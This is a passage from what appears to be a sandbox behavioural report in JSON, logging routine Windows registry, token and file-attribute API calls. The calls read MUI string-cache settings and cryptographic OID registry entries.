            "id": 1549
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baf05",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "ValueName",
                "value": "StringCacheGeneration"
              },
              {
                "name": "Type",
                "value": "4",
                "pretty_value": "REG_DWORD"
              },
              {
                "name": "Information",
                "value": "2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration"
              }
            ],
            "repeated": 0,
            "id": 1550
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baf2f",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000550"
              }
            ],
            "repeated": 0,
            "id": 1551
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee34a6c8b",
            "parentcaller": "0x7ffee34867b5",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1552
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee34867ec",
            "parentcaller": "0x7ffee10bfa4e",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "DesiredAccess",
                "value": "0x02000000",
                "pretty_value": "MAXIMUM_ALLOWED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER"
              }
            ],
            "repeated": 0,
            "id": 1553
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10bf9e9",
            "parentcaller": "0x7ffee10cad45",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0002001f",
                "pretty_value": "KEY_READ|KEY_WRITE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000550"
              },
              {
                "name": "ObjectAttributesName",
                "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              }
            ],
            "repeated": 0,
            "id": 1554
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10bfa05",
            "parentcaller": "0x7ffee10cad45",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000550"
              }
            ],
            "repeated": 0,
            "id": 1555
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10c07f5",
            "parentcaller": "0x7ffee10ba864",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ci.dll"
              }
            ],
            "repeated": 0,
            "id": 1556
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10be270",
            "parentcaller": "0x7ffee10bb8b0",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "ValueName",
                "value": "@%SystemRoot%\\System32\\ci.dll,-101"
              },
              {
                "name": "Type",
                "value": "1",
                "pretty_value": "REG_SZ"
              },
              {
                "name": "Information",
                "value": "Enclave"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\System32\\ci.dll,-101"
              }
            ],
            "repeated": 0,
            "id": 1557
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10ba8d5",
            "parentcaller": "0x7ffee10ffc2b",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000054c"
              }
            ],
            "repeated": 0,
            "id": 1558
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbf464",
            "parentcaller": "0x7ffee0bbf2b2",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000548"
              }
            ],
            "repeated": 0,
            "id": 1559
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe88e",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000544"
              }
            ],
            "repeated": 0,
            "id": 1560
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe781",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegEnumKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000540"
              },
              {
                "name": "Index",
                "value": "2"
              },
              {
                "name": "Name",
                "value": "1.3.6.1.4.1.311.64.1.1!7"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7"
              }
            ],
            "repeated": 0,
            "id": 1561
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe7b1",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000540"
              },
              {
                "name": "SubKey",
                "value": "1.3.6.1.4.1.311.64.1.1!7"
              },
              {
                "name": "Handle",
                "value": "0x00000544"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7"
              }
            ],
            "repeated": 0,
            "id": 1562
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe9c3",
            "parentcaller": "0x7ffee0bbe7fb",
            "category": "registry",
            "api": "RegQueryInfoKeyW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000544"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "SubKeyCount",
                "value": "0"
              },
              {
                "name": "MaxSubKeyLength",
                "value": "0"
              },
              {
                "name": "MaxClassLength",
                "value": "0"
              },
              {
                "name": "ValueCount",
                "value": "1"
              },
              {
                "name": "MaxValueNameLength",
                "value": "4"
              },
              {
                "name": "MaxValueLength",
                "value": "78"
              }
            ],
            "repeated": 0,
            "id": 1563
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbeac9",
            "parentcaller": "0x7ffee0bbe7fb",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000544"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\system32\\dnsapi.dll,-103"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name"
              }
            ],
            "repeated": 0,
            "id": 1564
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbf1d0",
            "parentcaller": "0x7ffee0bb34e9",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7"
              },
              {
                "name": "Handle",
                "value": "0x00000548"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7"
              }
            ],
            "repeated": 0,
            "id": 1565
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10c2e92",
            "parentcaller": "0x7ffee10ffb6e",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000548"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\system32\\dnsapi.dll,-103"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name"
              }
            ],
            "repeated": 0,
            "id": 1566
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baeb5",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              }
            ],
            "repeated": 0,
            "id": 1567
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baf05",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "ValueName",
                "value": "StringCacheGeneration"
              },
              {
                "name": "Type",
                "value": "4",
                "pretty_value": "REG_DWORD"
              },
              {
                "name": "Information",
                "value": "2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration"
              }
            ],
            "repeated": 0,
            "id": 1568
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baf2f",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000054c"
              }
            ],
            "repeated": 0,
            "id": 1569
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee34a6c8b",
            "parentcaller": "0x7ffee34867b5",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1570
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee34867ec",
            "parentcaller": "0x7ffee10bfa4e",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x02000000",
                "pretty_value": "MAXIMUM_ALLOWED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER"
              }
            ],
            "repeated": 0,
            "id": 1571
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10bf9e9",
            "parentcaller": "0x7ffee10cad45",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0002001f",
                "pretty_value": "KEY_READ|KEY_WRITE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x0000054c"
              },
              {
                "name": "ObjectAttributesName",
                "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              }
            ],
            "repeated": 0,
            "id": 1572
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10bfa05",
            "parentcaller": "0x7ffee10cad45",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000054c"
              }
            ],
            "repeated": 0,
            "id": 1573
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10c07f5",
            "parentcaller": "0x7ffee10ba864",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\dnsapi.dll"
              }
            ],
            "repeated": 0,
            "id": 1574
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10be270",
            "parentcaller": "0x7ffee10bb8b0",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "ValueName",
                "value": "@%SystemRoot%\\system32\\dnsapi.dll,-103"
              },
              {
                "name": "Type",
                "value": "1",
                "pretty_value": "REG_SZ"
              },
              {
                "name": "Information",
                "value": "\\x414\\x43e\\x432\\x435\\x440\\x435\\x43d\\x43d\\x44b\\x439 DNS-\\x441\\x435\\x440\\x432\\x435\\x440"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\dnsapi.dll,-103"
              }
            ],
            "repeated": 0,
            "id": 1575
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10ba8d5",
            "parentcaller": "0x7ffee10ffc2b",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000550"
              }
            ],
            "repeated": 0,
            "id": 1576
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10c2e92",
            "parentcaller": "0x7ffee10ffb6e",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000548"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\system32\\dnsapi.dll,-103"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name"
              }
            ],
            "repeated": 0,
            "id": 1577
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baeb5",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings"
              }
            ],
            "repeated": 0,
            "id": 1578
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baf05",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "ValueName",
                "value": "StringCacheGeneration"
              },
              {
                "name": "Type",
                "value": "4",
                "pretty_value": "REG_DWORD"
              },
              {
                "name": "Information",
                "value": "2"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration"
              }
            ],
            "repeated": 0,
            "id": 1579
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10baf2f",
            "parentcaller": "0x7ffee10ba4cb",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000550"
              }
            ],
            "repeated": 0,
            "id": 1580
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee34a6c8b",
            "parentcaller": "0x7ffee34867b5",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1581
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee34867ec",
            "parentcaller": "0x7ffee10bfa4e",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000550"
              },
              {
                "name": "DesiredAccess",
                "value": "0x02000000",
                "pretty_value": "MAXIMUM_ALLOWED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER"
              }
            ],
            "repeated": 0,
            "id": 1582
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10bf9e9",
            "parentcaller": "0x7ffee10cad45",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0002001f",
                "pretty_value": "KEY_READ|KEY_WRITE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000550"
              },
              {
                "name": "ObjectAttributesName",
                "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78"
              }
            ],
            "repeated": 0,
            "id": 1583
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10bfa05",
            "parentcaller": "0x7ffee10cad45",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000550"
              }
            ],
            "repeated": 0,
            "id": 1584
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10c07f5",
            "parentcaller": "0x7ffee10ba864",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\dnsapi.dll"
              }
            ],
            "repeated": 0,
            "id": 1585
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10be270",
            "parentcaller": "0x7ffee10bb8b0",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000054c"
              },
              {
                "name": "ValueName",
                "value": "@%SystemRoot%\\system32\\dnsapi.dll,-103"
              },
              {
                "name": "Type",
                "value": "1",
                "pretty_value": "REG_SZ"
              },
              {
                "name": "Information",
                "value": "\\x414\\x43e\\x432\\x435\\x440\\x435\\x43d\\x43d\\x44b\\x439 DNS-\\x441\\x435\\x440\\x432\\x435\\x440"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\dnsapi.dll,-103"
              }
            ],
            "repeated": 0,
            "id": 1586
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee10ba8d5",
            "parentcaller": "0x7ffee10ffc2b",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000054c"
              }
            ],
            "repeated": 0,
            "id": 1587
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbf464",
            "parentcaller": "0x7ffee0bbf2b2",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000548"
              }
            ],
            "repeated": 0,
            "id": 1588
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe88e",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000544"
              }
            ],
            "repeated": 0,
            "id": 1589
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe781",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegEnumKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000540"
              },
              {
                "name": "Index",
                "value": "3"
              },
              {
                "name": "Name",
                "value": "1.3.6.1.4.1.311.76.6.1!7"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7"
              }
            ],
            "repeated": 0,
            "id": 1590
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe7b1",
            "parentcaller": "0x7ffee0bb263f",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000540"
              },
              {
                "name": "SubKey",
                "value": "1.3.6.1.4.1.311.76.6.1!7"
              },
              {
                "name": "Handle",
                "value": "0x00000544"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7"
              }
            ],
            "repeated": 0,
            "id": 1591
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe9c3",
            "parentcaller": "0x7ffee0bbe7fb",
            "category": "registry",
            "api": "RegQueryInfoKeyW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000544"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "SubKeyCount",
                "value": "0"
              },
              {
                "name": "MaxSubKeyLength",
                "value": "0"
              },
              {
                "name": "MaxClassLength",
                "value": "0"
              },
              {
                "name": "ValueCount",
                "value": "1"
              },
              {
                "name": "MaxValueNameLength",
                "value": "4"
              },
              {
                "name": "MaxValueLength",
                "value": "80"
              }
            ],
            "repeated": 0,
            "id": 1592
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbeac9",
            "parentcaller": "0x7ffee0bbe7fb",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000544"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "ValueName",
                "value": "Name"
              },
              {
                "name": "Data",
                "value": "@%SystemRoot%\\System32\\wuaueng.dll,-400"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7\\Name"
              }
            ],
            "repeated": 0,
            "id": 1593
          },
          {
            "timestamp": "2025-11-20 10:58:35,359",
            "thread_id": "1596",
            "caller": "0x7ffee0bbf1d0",
            "parentcaller": "0x7ffee0bb34e9",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.76.6.1!7"
              },
              {
